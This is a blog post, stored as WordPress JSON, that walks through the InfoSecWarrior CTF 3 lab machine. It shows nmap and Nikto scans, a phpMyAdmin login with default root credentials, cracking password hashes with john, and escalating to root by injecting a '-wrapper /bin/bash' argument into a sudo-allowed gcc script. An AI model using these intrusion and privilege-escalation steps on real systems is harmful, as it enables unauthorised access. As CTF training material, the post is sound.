{"id":26013,"date":"2020-04-09T23:55:45","date_gmt":"2020-04-09T18:25:45","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=26013"},"modified":"2020-04-10T09:26:08","modified_gmt":"2020-04-10T03:56:08","slug":"infosecwarrior-ctf-3-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/","title":{"rendered":"InfoSecWarrior CTF: 3 Walkthrough"},"content":{"rendered":"

Here is the new challenge, InfoSecWarrior CTF: 3 Walkthrough<\/strong><\/a>, by Infosec Warrior CTF 2020<\/a>. The box is designed by Vishal Biswas aka CyberKnight. The goal is to gain the highest privileges and collect only 2 flags (user flag and root flag). According to the author, a WordPress developer configured the machine to work internally, but due to a misconfiguration WordPress is exposed to the outside world. Use your skills and get the root flag. So let us go.<\/p>\n

Pentester Methodology<\/h3>\n
Network Scanning<\/h5>\n
  • Netdiscover<\/li>\n
  • Nmap<\/li>\n<\/ul>\n
Enumeration<\/h5>\n
  • Nikto<\/li>\n
  • phpMyAdmin<\/li>\n
  • John<\/li>\n
  • SSH<\/li>\n<\/ul>\n
Privilege Escalation<\/h5>\n
  • sudo -l<\/li>\n
  • gcc compilation<\/li>\n<\/ul>\n

        Network Scanning<\/h3>\n

        We start with\u00a0Netdiscover<\/strong> to obtain the IP address, as follows:<\/p>\n

        #netdiscover -i vboxnet0\r\n\t Currently scanning: 192.168.12.0\/16   |   Screen View: Unique Hosts                                                                                                                            \r\n                                                                                                                                                                                                \r\n 2 Captured ARP Req\/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                \r\n _____________________________________________________________________________\r\n   IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \r\n -----------------------------------------------------------------------------\r\n 192.168.2.2     08:00:27:a0:51:d5      1      42  PCS Systemtechnik GmbH                                                                                                                       \r\n 192.168.2.17    08:00:27:a7:26:e1      1      60  PCS Systemtechnik GmbH\r\n<\/pre>\n

        We got the machine IP 192.168.2.17<\/strong>, so let us scan it with\u00a0Nmap.<\/strong><\/p>\n

        #nmap -p- -A -O 192.168.2.17\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-09 18:53 IST\r\nNmap scan report for 192.168.2.17\r\nHost is up (0.00048s latency).\r\nNot shown: 65533 closed ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey: \r\n|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)\r\n|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)\r\n|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)\r\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\r\n|_http-generator: WordPress 5.3.2\r\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\r\n|_http-title: TEST WORDPRESS \u2013 Just another WordPress site\r\nMAC Address: 08:00:27:A7:26:E1 (Oracle VirtualBox virtual NIC)\r\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\r\nTCP\/IP fingerprint:\r\nOS:SCAN(V=7.80%E=4%D=4\/9%OT=22%CT=1%CU=44313%PV=Y%DS=1%DC=D%G=Y%M=080027%TM\r\nOS:=5E8F21EA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%\r\nOS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5\r\nOS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=\r\nOS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%\r\nOS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0\r\nOS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S\r\nOS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R\r\nOS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N\r\nOS:%T=40%CD=S)<\/pre>\n

        Enumeration<\/h3>\n

        On visiting the web page, we see a WordPress website, but it doesn\u2019t work properly, so we moved on to our next step.<\/p>\n

        So I fired up\u00a0Nikto<\/strong> and found a\u00a0phpMyAdmin page.<\/strong><\/p>\n

        #nikto -h http:\/\/192.168.2.17\/\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP:          192.168.2.17\r\n+ Target Hostname:    192.168.2.17\r\n+ Target Port:        80\r\n+ Start Time:         2020-04-09 18:55:13 (GMT5.5)\r\n---------------------------------------------------------------------------\r\n+ Server: Apache\/2.4.29 (Ubuntu)\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ Uncommon header 'link' found, with contents: <http:\/\/127.0.0.1\/index.php\/wp-json\/>; rel=\"https:\/\/api.w.org\/\"\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type\r\n+ Uncommon header 'x-redirect-by' found, with contents: WordPress\r\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\r\n+ Apache\/2.4.29 appears to be outdated (current is at least Apache\/2.4.37). 
Apache 2.2.34 is the EOL for the 2.x branch.\r\n+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.\r\n+ Uncommon header 'x-ob_mode' found, with contents: 1\r\n+ Cookie goto created without the httponly flag\r\n+ Cookie back created without the httponly flag\r\n+ OSVDB-3092: \/phpMyAdmin\/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\r\n+ OSVDB-3233: \/icons\/README: Apache default file found.\r\n+ \/wp-content\/plugins\/akismet\/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version\r\n+ \/wp-links-opml.php: This WordPress script reveals the installed version.\r\n+ OSVDB-3092: \/license.txt: License file found may identify site software.\r\n+ \/: A WordPress installation was found.\r\n+ \/phpmyadmin\/: phpMyAdmin directory found\r\n+ Cookie wordpress_test_cookie created without the httponly flag\r\n+ \/wp-login.php: WordPress login found\r\n+ OSVDB-3092: \/phpMyAdmin\/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\r\n+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host\r\n+ End Time:           2020-04-09 18:56:16 (GMT5.5) (63 seconds)\r\n---------------------------------------------------------------------------\r\n+ 1 host(s) tested<\/pre>\n

        So I logged in with the credentials root: root.<\/strong> It was a success.<\/p>\n

        We successfully logged in as the MySQL root user. Then I selected the wpdb database and opened the wp-user table, where we see two user entries, Krishna and user1, as shown in the image.<\/p>\n

        I copied the users' hashes, saved them to text files, and cracked them with the john tool using the following commands:<\/p>\n

        john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\r\nUsing default input encoding: UTF-8\r\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 256\/256 AVX2 8x3])\r\nCost 1 (iteration count) is 8192 for all loaded hashes\r\nWill run 2 OpenMP threads\r\nPress 'q' or Ctrl-C to abort, almost any other key for status\r\n0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g\/s 5444p\/s 5444c\/s 5444C\/s sharpie1..alvina\r\n0g 0:00:00:45 1.36% (ETA: 20:08:02) 0g\/s 5109p\/s 5109c\/s 5109C\/s 12062525..109109109\r\ninfosec\t\t\t\t\t(?)\r\nSession aborted\r\n\r\njohn --wordlist=\/usr\/share\/wordlists\/rockyou.txt user\r\nUsing default input encoding: UTF-8\r\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 256\/256 AVX2 8x3])\r\nCost 1 (iteration count) is 8192 for all loaded hashes\r\nWill run 2 OpenMP threads\r\nPress 'q' or Ctrl-C to abort, almost any other key for status\r\n0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g\/s 5444p\/s 5444c\/s 5444C\/s sharpie1..alvina\r\n0g 0:00:00:45 23.36% (ETA: 20:08:02) 0g\/s 5109p\/s 5109c\/s 5109C\/s 12062525..109109109\r\nuser1\t\t\t\t\t(?)\r\nSession aborted<\/pre>\n

        The WordPress hashes were cracked successfully, so I tried to log in over SSH using the WordPress credentials and got a shell as Krishna. Krishna: infosec<\/p>\n

        #ssh krishna@192.168.2.17\r\nThe authenticity of host '192.168.2.17 (192.168.2.17)' can't be established.\r\nECDSA key fingerprint is SHA256:L8AFuzt5MRe4jDRpDukvoY4rrvpBMl49RbM0tbVdeVM.\r\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\r\nWarning: Permanently added '192.168.2.17' (ECDSA) to the list of known hosts.\r\nkrishna@192.168.2.17's password: \r\nkrishna@ck05:~$ id \r\nuid=1001(krishna) gid=1001(krishna) groups=1001(krishna)\r\nkrishna@ck05:~$ hostname\r\nck05\r\nkrishna@ck05:~$ whoami \r\nkrishna<\/pre>\n

        Got the shell.<\/p>\n

        Privilege Escalation<\/h3>\n

        I ran the sudo -l<\/strong> command and found that Krishna<\/strong> has sudo<\/strong> permission to run a bash script as loopspell<\/strong>. This script compiles a C<\/strong> language file using gcc<\/strong>; using this command we escalate privileges on this machine.<\/p>\n

        krishna@ck05:~$ sudo -l\r\nMatching Defaults entries for krishna on ck05:\r\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\r\n\r\nUser krishna may run the following commands on ck05:\r\n    (loopspell : ALL) NOPASSWD: \/home\/loopspell\/code_compiler.sh\r\nkrishna@ck05:~$ sudo -u loopspell \/home\/loopspell\/code_compiler.sh \"-wrapper \/bin\/bash,-s .\"\r\nCode is being compiling ...\r\nloopspell@ck05:~$ id \r\nuid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)\r\nloopspell@ck05:~$ hostname\r\nck05\r\nloopspell@ck05:~$ whoami \r\nloopspell<\/pre>\n

        Running the sudo -l command again, we see sudoers file entries for \/usr\/bin\/gcc<\/strong> and code_compiler.sh<\/strong>. Using sudo, I ran the privilege escalation command again and we have a root shell on the target machine.<\/p>\n

        loopspell@ck05:\/home$ cd loopspell\/\r\nloopspell@ck05:\/home\/loopspell$ ls \r\nbackup.c  backup.txt  code_compiler.sh\tuser.txt\r\nloopspell@ck05:\/home\/loopspell$ cat user.txt \r\na4e3fea7510e570f6964899eb764abdc\r\nloopspell@ck05:\/home\/loopspell$ sudo -l\r\nMatching Defaults entries for loopspell on ck05:\r\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\r\n\r\nUser loopspell may run the following commands on ck05:\r\n    (ALL : ALL) \/usr\/bin\/gcc\r\n    (ALL : ALL) NOPASSWD: \/home\/loopspell\/code_compiler.sh\r\nloopspell@ck05:\/home\/loopspell$ sudo -l\r\nMatching Defaults entries for loopspell on ck05:\r\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\r\n\r\nUser loopspell may run the following commands on ck05:\r\n    (ALL : ALL) \/usr\/bin\/gcc\r\n    (ALL : ALL) NOPASSWD: \/home\/loopspell\/code_compiler.sh\r\nloopspell@ck05:\/home\/loopspell$ sudo \/home\/loopspell\/code_compiler.sh \r\nCode is being compiling ...\r\ngcc: fatal error: no input files\r\ncompilation terminated.\r\nYou can find your compiled code in \/tmp\/ directory.\r\nloopspell@ck05:\/home\/loopspell$ sudo \/home\/loopspell\/code_compiler.sh \"-wrapper \/bin\/bash,-s .\"\r\nCode is being compiling ...\r\nroot@ck05:\/home\/loopspell# id \r\nuid=0(root) gid=0(root) groups=0(root)\r\nroot@ck05:\/home\/loopspell# hostname\r\nck05\r\nroot@ck05:\/home\/loopspell# whoami\r\nroot\r\nroot@ck05:\/home\/loopspell# passwd\r\nEnter new UNIX password: \r\nRetype new UNIX password: \r\npasswd: password updated successfully\r\nroot@ck05:\/home\/loopspell# cd \r\nroot@ck05:~# ls\r\nmsg.txt\r\nroot@ck05:~# cd \/root\/\r\nroot@ck05:\/root# ls\r\nroot.txt\r\nroot@ck05:\/root# cat root\r\ncat: root: No such file or directory\r\nroot@ck05:\/root# cat root.txt \r\n_________        ___.                 ____  __.      
.__       .__     __    _______   .________\r\n\\_   ___ \\___.__.\\_ |__   ___________|    |\/ _| ____ |__| ____ |  |___\/  |_  \\   _  \\  |   ____\/\r\n\/    \\  \\<   |  | | __ \\_\/ __ \\_  __ \\      <  \/    \\|  |\/ ___\\|  |  \\   __\\ \/  \/_\\  \\ |____  \\ \r\n\\     \\___\\___  | | \\_\\ \\  ___\/|  | \\\/    |  \\|   |  \\  \/ \/_\/  >   Y  \\  |   \\  \\_\/   \\\/       \\\r\n \\______  \/ ____| |___  \/\\___  >__|  |____|__ \\___|  \/__\\___  \/|___|  \/__|    \\_____  \/______  \/\r\n        \\\/\\\/          \\\/     \\\/              \\\/    \\\/  \/_____\/      \\\/              \\\/       \\\/ \r\n\r\n\r\nflag = efa4c284b8e2a15674dfb369384c8bcf\r\n\r\nThis flag is a proof that you get the root shell.\r\n\r\nTag me on Twitter with @CyberKnight00 \r\nroot@ck05:\/root# \r\n<\/pre>\n

        Eureka !!!! got root.<\/p>\n","protected":false},"excerpt":{"rendered":"

        Here is the new challenge of InfoSecWarrior CTF: 3 Walkthrough by Infosec Warrior CTF 2020. The box is designed by…<\/p>\n","protected":false},"author":1,"featured_media":26015,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[124,125,119,123,118,122],"yoast_head_json":{"title":"InfoSecWarrior CTF: 3 Walkthrough - Armour Infosec","description":"Here is the walkthrough of last challenge of InfosecWarrior CTF: 3 by Infosec Warriors. The box is designed by Vishal Biswas aka Cyber Knight.","canonical":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/","author":"Armour Infosec","article_published_time":"2020-04-09T18:25:45+00:00","article_modified_time":"2020-04-10T03:56:08+00:00"}}